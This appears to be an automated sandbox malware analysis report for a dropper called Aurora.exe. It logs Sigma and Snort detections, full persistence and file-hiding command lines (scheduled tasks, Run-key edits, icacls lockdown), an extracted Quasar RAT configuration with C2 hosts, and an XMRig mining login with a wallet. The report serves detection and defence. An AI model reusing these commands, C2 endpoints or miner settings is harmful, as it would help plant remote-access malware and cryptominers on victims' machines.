/tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f, ProcessId: 6976, ProcessName: cmd.exe
                      Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7176, ParentProcessName: conhost.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 4324, ProcessName: svchost.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Msedge.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe, ProcessId: 3064, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Edge
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c start cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe" && exit" && && exit ", CommandLine: C:\Windows\system32\cmd.exe /c start cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe" && exit" && && exit ", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" , ParentImage: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe, ParentProcessId: 3064, ParentProcessName: AdobeUpdate.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c start cmd /Q /C " ping localhost -n 1 && copy "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" "C:\Users\user\AppData\Local\Msedge.exe" && attrib +r +h +a "C:\Users\user\AppData\Local\Msedge.exe" && icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA) && del "C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exe" && cmd /C "start "C:\Users\user\AppData\Local\Msedge.exe" && exit" && && exit ", ProcessId: 1220, ProcessName: cmd.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f, CommandLine: schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "cmd" /C schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6976, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f, ProcessId: 7332, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe, CommandLine: C:\Windows\System32\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 7176, ParentProcessName: conhost.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe, ProcessId: 4324, ProcessName: svchost.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String', CommandLine: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String', CommandLine|base64offset|contains: E, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe" , ParentImage: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe, ParentProcessId: 6972, ParentProcessName: OneDrive.exe, ProcessCommandLine: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String', ProcessId: 3320, ProcessName: powershell.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 7532, ProcessName: svchost.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }, ProcessId: 7388, ProcessName: powershell.exe
                      Source: Process startedAuthor: Joe Security: Data: Command: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String', CommandLine: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String', CommandLine|base64offset|contains: E, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe" , ParentImage: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exe, ParentProcessId: 6972, ParentProcessName: OneDrive.exe, ProcessCommandLine: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String', ProcessId: 3320, ProcessName: powershell.exe
                      No Snort rule has matched
                      Timestamp:2024-07-26T20:46:54.696928+0200
                      SID:2849662
                      Source Port:49765
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:46:08.090907+0200
                      SID:2849662
                      Source Port:49756
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:46:28.035116+0200
                      SID:2849662
                      Source Port:49760
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:45:54.861940+0200
                      SID:2849662
                      Source Port:49751
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:45:14.137276+0200
                      SID:2849662
                      Source Port:49737
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:45:27.789532+0200
                      SID:2849662
                      Source Port:49746
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:45:41.579547+0200
                      SID:2849662
                      Source Port:49749
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:45:48.234913+0200
                      SID:2849662
                      Source Port:49750
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:47:01.471138+0200
                      SID:2849662
                      Source Port:49766
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:45:19.757640+0200
                      SID:2022930
                      Source Port:443
                      Destination Port:49743
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-26T20:46:34.657862+0200
                      SID:2849662
                      Source Port:49761
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:45:21.107001+0200
                      SID:2849662
                      Source Port:49744
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:45:07.197859+0200
                      SID:2849662
                      Source Port:49730
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:45:34.936994+0200
                      SID:2849662
                      Source Port:49747
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:46:01.485959+0200
                      SID:2849662
                      Source Port:49754
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:46:21.408739+0200
                      SID:2849662
                      Source Port:49758
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:46:48.046438+0200
                      SID:2849662
                      Source Port:49763
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:46:41.394310+0200
                      SID:2849662
                      Source Port:49762
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:47:20.170176+0200
                      SID:2849662
                      Source Port:49767
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:46:14.752306+0200
                      SID:2849662
                      Source Port:49757
                      Destination Port:28105
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-26T20:44:56.074914+0200
                      SID:2826930
                      Source Port:49755
                      Destination Port:14444
                      Protocol:TCP
                      Classtype:Crypto Currency Mining Activity Detected
                      Timestamp:2024-07-26T20:45:57.548139+0200
                      SID:2022930
                      Source Port:443
                      Destination Port:49752
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: Aurora.exeAvira: detected
                      Source: C:\Users\user\AppData\Local\Msedge.exeAvira: detection malicious, Label: HEUR/AGEN.1315687
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeAvira: detection malicious, Label: HEUR/AGEN.1305500
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeAvira: detection malicious, Label: HEUR/AGEN.1315687
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exeAvira: detection malicious, Label: TR/AD.Nekark.apwee
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exeAvira: detection malicious, Label: TR/AD.Nekark.apwee
                      Source: 7.2.OneDrive.exe.43d6b80.1.raw.unpackMalware Configuration Extractor: Quasar {"Version": "1.4.1", "Host:Port": "auroraforge.art:55326;thesirenmika.com:55713;", "SubDirectory": "SubDir", "InstallName": "up2.exe", "MutexName": "0cbdfe7f-0215-41e8-a7b5-d4fbbc555089", "StartupKey": "Quasar Client Startup", "Tag": "themdas", "LogDirectoryName": "Logs", "ServerSignature": "PlHMOMtgocXM3HQK38PG08Pjiit+NwEciQu5lPY8tfLnYjCoMZYAx0xtdI+SvG5C0DXq12cXcC0umf/mq9foVZXMNF5Hs2PQTK2JDMn/hRfIF+Jjsb6WM+BVxpI718gj4lZGbCgGkF84rco627EYC7FkvV+GH8BLt9O9hPr4/+rJiNgiCoIYMn0OgCE/sH3sGydQJg57bn9U/mXFlhyIRhtm4gg2lM1G8RQ2XH+1kM20YvujsfPY0iStU8ykEpDnPvo2nlJo9S9+MJkEMt42ESO7Wgwea2ACoL2QuywV5GfCFYmzHmw9IDaqA/y7WyvVIvEg0NoGsezhwo2e6oEJrvYMUde6OTHjwHC8kacIVCvh6+yByGXPCjdQ+H6smKrq+LpoQLVQ20Io+hUnJLLx3faDB+Mrdo/wn43FOeeY6pvde3SMsY1XpENL1JPs8GG3TI0La479nFehiVp1bownoMxD7bv5pz2OTSwC+bmeB/u6k/e0qAPIfFzFMlMKPBLs1ee2ZhtAAu9MNcYtT4iTjxGRo+BdYz4VzLF0YuR7gW/KXvxHfHzIxl5gsQqlHmTKIvmwkZApWd13KsPue7aMCNBNetMgKotbQLGwuPGWkXPtyVe3zbXV84yx9a8EXdQy2rBif3ikTmvhQzPtqeUrXJzqUAZPzqvnfpFUeP+/3c0=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAMFuuJQ2UWVtaIczUNgeazANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTIzMDQwMzA0MDUwOFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAiClM+MYvRIRZkg0freUTCe0NshHnHXvYh8i2/B6np2DSYc6syzKH/d4kemUxEeD770K+4fsX42DqD05wvk+SmcuwHZ26OYCKSI/rg79364nUGWDwdTjS2LOpVzPfC/rF+aUI5X41YVO/BOt8Kw8yb2j1/uUVNajjm2gM7Wy3DAKG2PUXFGK/xtJsuOfjWVEFEStZGs5EbE5kMuNzxU3UfatoLZCVW866YNZIs9KIwFLYBaxoBScqJVcpRql2nDMOyOZt+wocL9l5buEIyKqT4sdRNUfoAUv6kxgo23l9f/dOMxG4eLYd7rNf6r5l0xRJMaz7emiUnqYyibaBmC2fIv6fuyjPZn9QB4+ujg0OGaWAPnikZXEd1F5jy4jwnBqilo+Kx5UdXg00pqVYBXr+K3AzcMzc02Yqwr3J8Rlfgsu4C6BVbHUY6AXA+8xzbyLK3fvp0M9Dxs8DKw7UpkZ7Bolhy8NE3LRgI7TFHXNjRzM8u5ZiCL8VIUOsDgUFKakEh0MrGEaHZUG3VjUO0xDdA7CG9s8FQ5mYPH2NlORjReWcdoJurPogIffwNkP6nIgltEwBuVufNrMjtUDq3GUNiuhG5GJnDVypRGAOJEeOkug+OMfFmTDhOAWuPsvr+dhak7ue/4FlW2gxA+HRlw200v70/hHbpNv66ypjWg1X9jECAwEAAaMyMDAwHQYDVR0OBBYEFEZ+DMcRz+rZt2AYOssjt4gJDXJOMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAHAGY8cy4TMd3uimwhX4giP4+xh3Nf0FVipqVxteNQTqxP7t2BabEdhmtlh7O/QY0NrQcHZfTQ0N17MnczuHDPsE41keL18jYueJZ+yId43zFc3Rlez8W4nrId2DbbcCRffmYSuwAGvXfcZDOYrTOpXFdU1WeVOazRUYYyrlBUZfOX+lbLHSlho/C7/6ULvYz9LIC1WakGFjLt8Yw5jpWSBPjGpbOUNIZ0JFalvr7iCrrNEtsLEQs5rcoiH73TBGE1QDgTOz/4zp6WRNoRr9Yy5mbC2qB2RbAtMIydKX/3yBZw/gHBGK7bxGmcecLwYVFkLR/BvfcpdVP4Jy5O65oEx01sFfC3TMG+XyGV3CxOvoG4brCW99GDZmUWsVmmbSI+X2caujvstj6psjYeRcGUELmU6dPNxWTNUOeeppRDQfZeA0rEr5pecx4NMCj6nLrhRUlTQ6pXg6vpVt2PS+5xC5qgn839Ic5RehAccmgHat+VqnqlqF9oucwNJVDoOcNey0yAYXMPqM6KZrVsrEGmxljkuqaafi9CJJbSah9K6YMfZdZsPxlNnLmg3CcSNISkL602S3tiWO1/heTAFVK6dx1domDE4Lk6Y7hEqEdDfyokDNExRPfD5ngHpseHXEYQteQywDb5MZZc7XLHM4dgm3cRxnGtWR0H7SjMddMZ5C"}
                      Source: C:\Users\user\AppData\Local\Msedge.exeReversingLabs: Detection: 66%
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeReversingLabs: Detection: 66%
                      Source: C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exeReversingLabs: Detection: 52%
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeReversingLabs: Detection: 95%
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeReversingLabs: Detection: 68%
                      Source: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exeReversingLabs: Detection: 52%
                      Source: Yara matchFile source: 7.2.OneDrive.exe.43d6b80.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.46f41b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.46f41b0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.OneDrive.exe.43d6b80.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001F.00000002.1804400683.000000000466E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1727999189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1824795418.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2933944946.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.2092621986.0000000002E4B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1787802985.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.1905772220.0000000004EEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1728900790.0000000004AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000002.2078076863.0000000002C6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.1787802985.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000037.00000002.2085170193.00000000048DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1798111902.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1728900790.00000000040B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: OneDrive.exe PID: 6972, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7220, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: OneDrive Updater.exe PID: 7736, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7880, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: OneDrive Updater.exe PID: 8124, type: MEMORYSTR
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exeJoe Sandbox ML: detected
                      Source: Aurora.exeJoe Sandbox ML: detected

                      Bitcoin Miner

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 0000003C.00000002.2918345092.00000273AB26A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: unknownDNS query: name: xmr-us-east1.nanopool.org
                      Source: global trafficTCP traffic: 192.168.2.4:49755 -> 51.79.71.77:14444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"43plzcogjlsy4cuttmuws8ha5w6xtsnr5dnegaak71dnkpbdfia2ysqskr5b7zq8qys6crlqbmazl2d3aw1rq6xhrjuymbt","pass":"","agent":"xmrig/6.19.0 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
                      Source: Aurora.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\Aurora.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                      Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 00000004.00000002.2918227460.0000000000B27000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdbx source: build.exe, 00000004.00000002.2918227460.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbB) source: Aurora.exe, 00000000.00000002.1987273449.0000000002089000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 00000004.00000002.2918227460.0000000000B82000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: build.exe, 00000004.00000002.2918227460.0000000000B82000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb~- source: build.exe, 00000004.00000002.2918227460.0000000000B82000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbu source: Aurora.exe, 00000000.00000002.1994816261.00000000042E6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Aurora.exe, 00000000.00000002.1987273449.0000000002089000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: nHC:\Windows\System.ServiceModel.pdb source: build.exe, 00000004.00000002.2916704878.0000000000987000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: Aurora.exe, 00000000.00000002.1956220610.00000000012B4000.00000040.00000001.01000000.00000003.sdmp
